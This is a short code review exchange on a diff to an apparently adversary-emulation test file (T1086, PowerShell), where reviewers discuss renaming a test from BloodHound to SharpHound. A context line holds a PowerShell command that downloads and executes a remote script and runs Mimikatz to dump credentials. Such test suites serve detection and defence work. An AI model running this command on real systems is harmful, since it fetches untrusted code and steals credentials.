atomics/T1086/T1086.yaml

```diff
@@ -19,25 +19,48 @@ atomic_tests:
     command: |
       powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
 
-- name: BloodHound
+- name: SharpHound
```

Comment:
Personally, I would still call it Bloodhound although you actually run a file called SharpHound. SharpHound is the C# implementation of running Bloodhound which has better performance.

Reply:
I'm not set on this though so its up to you.